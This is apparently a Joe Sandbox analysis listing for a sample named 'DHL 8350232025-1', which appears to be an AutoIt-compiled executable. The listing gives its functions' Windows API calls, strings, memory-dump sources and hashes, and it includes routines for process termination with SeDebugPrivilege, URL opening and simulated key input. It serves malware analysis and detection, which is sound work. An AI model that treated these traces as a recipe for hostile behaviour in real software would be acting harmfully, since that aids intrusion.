GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001E3AAF,?,?,Bad directive syntax error,0023CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002098BC
LoadStringW.USER32(00000000,?,001E3AAF,?), ref: 002098C3

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00209987

Strings

Error: , xrefs: 00209955
Line %d:, xrefs: 00209912
., xrefs: 0020996D
Line %d (File "%s"):, xrefs: 0020992D
%s (%d) : ==> %s.: %s %s, xrefs: 002098F1

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 15f5f5ed44dcda7b54599b592b62d25eb4b55aa5874f9e2da4470afd4d9d8816
Instruction ID: 45d4ce8655c19fce4e5d668b7a5611362e7b704279eb3f78dbc6b15855de65b9
Opcode Fuzzy Hash: 15f5f5ed44dcda7b54599b592b62d25eb4b55aa5874f9e2da4470afd4d9d8816
Instruction Fuzzy Hash: 30216D3281021EABCF15AF90CC0AEEE7779FF29700F044469F515660A2EB719AA8DB50

Function 0020209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002020AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002020C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0020214D

Strings

largeicons, xrefs: 002020E1
smallicons, xrefs: 00202115
SHELLDLL_DefView, xrefs: 002020CC
details, xrefs: 002020FB
list, xrefs: 0020212F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 05121b716626ccc89d4fe25144714dcca0e1d9f215a48ad5272c42482c5f768a
Instruction ID: d31864a16f3fd206da4796c09c31369584312064872b1fa9723ee38407fedf4f
Opcode Fuzzy Hash: 05121b716626ccc89d4fe25144714dcca0e1d9f215a48ad5272c42482c5f768a
Instruction Fuzzy Hash: 96113D761A8327F6F7152620DC0FEA6B39CCB25314F20001BF709A50D3EBA1D8655A14

Function 001D8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32383d687d7313e7637335d6145f5f65b7f39790b8543a70ba7190287e28c52
Instruction ID: e4f73e3d0a6fc2a2a5226aafc1aef69de854a3f5227845b0d4772e70c0521d31
Opcode Fuzzy Hash: e32383d687d7313e7637335d6145f5f65b7f39790b8543a70ba7190287e28c52
Instruction Fuzzy Hash: E7C1F374A04349AFDF11DFA8E885BADBBB5AF29310F14419AF418A7392CB30D941CB61

Function 001DCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001DCEB7
_free.LIBCMT ref: 001DCF22
_free.LIBCMT ref: 001DCF48
_free.LIBCMT ref: 001DCF71
_free.LIBCMT ref: 001DCFA9
_free.LIBCMT ref: 001DCFDA
_free.LIBCMT ref: 001DD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 001DD09C
_free.LIBCMT ref: 001DD0B5

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: fa5571967d64059c148a1d3c410ce6651a1e2f3478736392a0ac6650eb2b4ac0
Instruction ID: 702ed6fedd57c44298a3d9977b5298cfc63a774083bf4601efa88ad90bee6211
Opcode Fuzzy Hash: fa5571967d64059c148a1d3c410ce6651a1e2f3478736392a0ac6650eb2b4ac0
Instruction Fuzzy Hash: DE6156B1904312AFDF25AFB4E885AAA7BA6EF22310F04456FF94497381D7319D01D790

Function 002350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00235186
ShowWindow.USER32(?,00000000), ref: 002351C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 002351CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 002351D1

Part of subcall function 00236FBA: DeleteObject.GDI32(00000000), ref: 00236FE6

GetWindowLongW.USER32(?,000000F0), ref: 0023520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0023521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0023524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00235287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00235296

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 122b8fbc53d9abfaaf4a4469b1aad5e4bf5ab092f48ea32aae52fc33cd72848d
Instruction ID: acd1a0159aef8667c3b5d8aa27386c00f4295d3d669f92e8011eb7272b47d054
Opcode Fuzzy Hash: 122b8fbc53d9abfaaf4a4469b1aad5e4bf5ab092f48ea32aae52fc33cd72848d
Instruction Fuzzy Hash: 4A51B3B0A70A29BFEF249F24CC4ABD93BA5EB05321F144011FE5D962E0C7B599A0DF41

Function 001B8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001F6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001F68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001F68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001F68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001F68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001B8874,00000000,00000000,00000000,000000FF,00000000), ref: 001F6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001F691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001B8874,00000000,00000000,00000000,000000FF,00000000), ref: 001F692D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: df722fffa623ba7bdbff7785f305646ca962f05a7bdaa54afa9104525c7b7155
Instruction ID: 775ab5789bec8457dd2155aa6face861b6ba999cfe5e7e0fb82e13bf28b1cddb
Opcode Fuzzy Hash: df722fffa623ba7bdbff7785f305646ca962f05a7bdaa54afa9104525c7b7155
Instruction Fuzzy Hash: 2A518A70600209EFDB24CF28DD55FAA7BB9FF58B50F204518FA16A72A0DB70E991DB50

Function 0021C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0021C182
GetLastError.KERNEL32 ref: 0021C195
SetEvent.KERNEL32(?), ref: 0021C1A9

Part of subcall function 0021C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0021C272
Part of subcall function 0021C253: GetLastError.KERNEL32 ref: 0021C322
Part of subcall function 0021C253: SetEvent.KERNEL32(?), ref: 0021C336
Part of subcall function 0021C253: InternetCloseHandle.WININET(00000000), ref: 0021C341

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 89bddc0022e687f2cbaa8b1ef1858f6e53cb250ea7095047030a8925d6e348ad
Instruction ID: cf9d642dca9c7672c597b3489fbbf7571a3baaee84a3e7f16025a43e48f2bca6
Opcode Fuzzy Hash: 89bddc0022e687f2cbaa8b1ef1858f6e53cb250ea7095047030a8925d6e348ad
Instruction Fuzzy Hash: 5F318375190601BFDB219FA5DC48AA7BBF9FF68300B20441EFD5692610D730E864DF60

Function 002025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00203A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00203A57
Part of subcall function 00203A3D: GetCurrentThreadId.KERNEL32 ref: 00203A5E
Part of subcall function 00203A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002025B3), ref: 00203A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002025BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002025DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002025DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002025E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00202601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00202605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0020260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00202623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00202627

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 60965bdb9951c1a6dcc47e8ced2c9e045f09c6fa05c82f227a71cb67790044bb
Instruction ID: 2aaaf1c88bae0283109252665b2785b511da7a1be586a8bbc0e7a024f55ef102
Opcode Fuzzy Hash: 60965bdb9951c1a6dcc47e8ced2c9e045f09c6fa05c82f227a71cb67790044bb
Instruction Fuzzy Hash: 6A01D4317A0310BBFB106768AC8EF593F5DDB8EB12F200012F358BE0D2C9E224549E69

Function 00201803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00201449,?,?,00000000), ref: 0020180C
HeapAlloc.KERNEL32(00000000,?,00201449,?,?,00000000), ref: 00201813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00201449,?,?,00000000), ref: 00201828
GetCurrentProcess.KERNEL32(?,00000000,?,00201449,?,?,00000000), ref: 00201830
DuplicateHandle.KERNEL32(00000000,?,00201449,?,?,00000000), ref: 00201833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00201449,?,?,00000000), ref: 00201843
GetCurrentProcess.KERNEL32(00201449,00000000,?,00201449,?,?,00000000), ref: 0020184B
DuplicateHandle.KERNEL32(00000000,?,00201449,?,?,00000000), ref: 0020184E
CreateThread.KERNEL32(00000000,00000000,00201874,00000000,00000000,00000000), ref: 00201868

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 4534762e018a8021342e86d0f862ccc2fa2dcf9b725f1bc1eebf8a6152accda0
Instruction ID: 95396961fa61b9c2009e89e5158b14f957912934614b3b3232b129d96f41d623
Opcode Fuzzy Hash: 4534762e018a8021342e86d0f862ccc2fa2dcf9b725f1bc1eebf8a6152accda0
Instruction Fuzzy Hash: 4C01BF75240304BFE710AB65EC4DF573B6CEB89B11F104411FA45DB191C670D810DB20

Function 0022A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0020D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0020D501
Part of subcall function 0020D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0020D50F
Part of subcall function 0020D4DC: CloseHandle.KERNEL32(00000000), ref: 0020D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0022A16D
GetLastError.KERNEL32 ref: 0022A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0022A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0022A268
GetLastError.KERNEL32(00000000), ref: 0022A273
CloseHandle.KERNEL32(00000000), ref: 0022A2C4

Strings

SeDebugPrivilege, xrefs: 0022A18F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 039d76734698be3be051a67754bcc599fe39b260a9682b65700ea7b4ea475e28
Instruction ID: 34f799f3398ecdbef060d76c7a11a8acaa1aef218344adbafd32b0a4a2103512
Opcode Fuzzy Hash: 039d76734698be3be051a67754bcc599fe39b260a9682b65700ea7b4ea475e28
Instruction Fuzzy Hash: C761C034214252EFD720DF58D894F15BBE1AF54318F18858CE86A8BBA3C772EC55CB92

Function 00233886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00233925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0023393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00233954
_wcslen.LIBCMT ref: 00233999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002339C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002339F4

Strings

SysListView32, xrefs: 002338F7

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 6ee3fdac7329c99da0bee33048f0bbb1edaa2fb128d294e4b3d03352c9e30ec7
Instruction ID: 163015b82cbfe88bc093c7760a1b0b2ab24a8e8bd759b8a04b39f70adbc25310
Opcode Fuzzy Hash: 6ee3fdac7329c99da0bee33048f0bbb1edaa2fb128d294e4b3d03352c9e30ec7
Instruction Fuzzy Hash: 2A41B471A10219ABEB21DF64CC49FEA77A9EF08350F100526F548E7281D771DAA0CB90

Function 0020BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0020BCFD
IsMenu.USER32(00000000), ref: 0020BD1D
CreatePopupMenu.USER32 ref: 0020BD53
GetMenuItemCount.USER32(010F5868), ref: 0020BDA4
InsertMenuItemW.USER32(010F5868,?,00000001,00000030), ref: 0020BDCC

Strings

0, xrefs: 0020BCA8
2, xrefs: 0020BD37

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: e387e417d30d328c25eaead6342f5b02c8db96c18b1bc3d8a073369fc833fa4a
Instruction ID: d16a52cdb081d3e0fbaa20faabec7c93e8c9dbd8385f03a01bd5e52e0dd498cd
Opcode Fuzzy Hash: e387e417d30d328c25eaead6342f5b02c8db96c18b1bc3d8a073369fc833fa4a
Instruction Fuzzy Hash: 64518F70A20306DBDF22DFA8D888BAEFBF4AF55314F244259E411A72D2D7709951CB61

Function 0020C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0020C913

Strings

info, xrefs: 0020C8B4
question, xrefs: 0020C8CC
stop, xrefs: 0020C8E4
warning, xrefs: 0020C8FC
blank, xrefs: 0020C895

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4c7d25b9585145d58a3cef60a08c7667a8ba8400bff36c2cd59f80abed8f821c
Instruction ID: b89e8fb5573a9ace86ee98e15df9b5a80099b46120441c1fe51c920ed3728a6b
Opcode Fuzzy Hash: 4c7d25b9585145d58a3cef60a08c7667a8ba8400bff36c2cd59f80abed8f821c
Instruction Fuzzy Hash: F2112B716A930BBAE7065F14DC82DBA679CDF25314F30412EF904A72C3D7B0DD505268

Function 0020DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0020DE42
gethostname.WSOCK32(?,00000100), ref: 0020DE5C
gethostbyname.WSOCK32(?), ref: 0020DE69
inet_ntoa.WSOCK32(?), ref: 0020DEAB
_strcat.LIBCMT ref: 0020DEB9
WSACleanup.WSOCK32 ref: 0020DEDE

Strings

0.0.0.0, xrefs: 0020DE87

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 977a58d6d289fc1f0b7640b6d707e93c075db93ad4cab90c63eab73f0cf34d93
Instruction ID: d1508e2fe5251a174a898b1dadbabba06617927c736c7b66267cf3247ec25d70
Opcode Fuzzy Hash: 977a58d6d289fc1f0b7640b6d707e93c075db93ad4cab90c63eab73f0cf34d93
Instruction Fuzzy Hash: 80110672914215AFDB20ABB0EC0AEEE77ACDF25714F110169F505AA0D2EF71CA918B60

Function 0020ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0020ED2A
_wcslen.LIBCMT ref: 0020ED3B
_wcslen.LIBCMT ref: 0020ED79
_wcslen.LIBCMT ref: 0020EDAF
_wcslen.LIBCMT ref: 0020EDDF
_wcslen.LIBCMT ref: 0020EDEF
_wcslen.LIBCMT ref: 0020EE2B
_wcslen.LIBCMT ref: 0020EE5A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: c8161f422a4388e9b07f274a7b3ea370e059176dd10cdcbf99a2ef5d165ed661
Instruction ID: 82eedb3b9bc01cdb32bf29eb86c0f9cda5cbed3fbc1f505891717e08b3653dd2
Opcode Fuzzy Hash: c8161f422a4388e9b07f274a7b3ea370e059176dd10cdcbf99a2ef5d165ed661
Instruction Fuzzy Hash: 0141A465C1021876CB11EBF4C88AFCFB7ACAF65310F50886AE518E3562FB34D255C3A6

Function 001BF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001F682C,00000004,00000000,00000000), ref: 001BF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,001F682C,00000004,00000000,00000000), ref: 001FF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001F682C,00000004,00000000,00000000), ref: 001FF454

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin
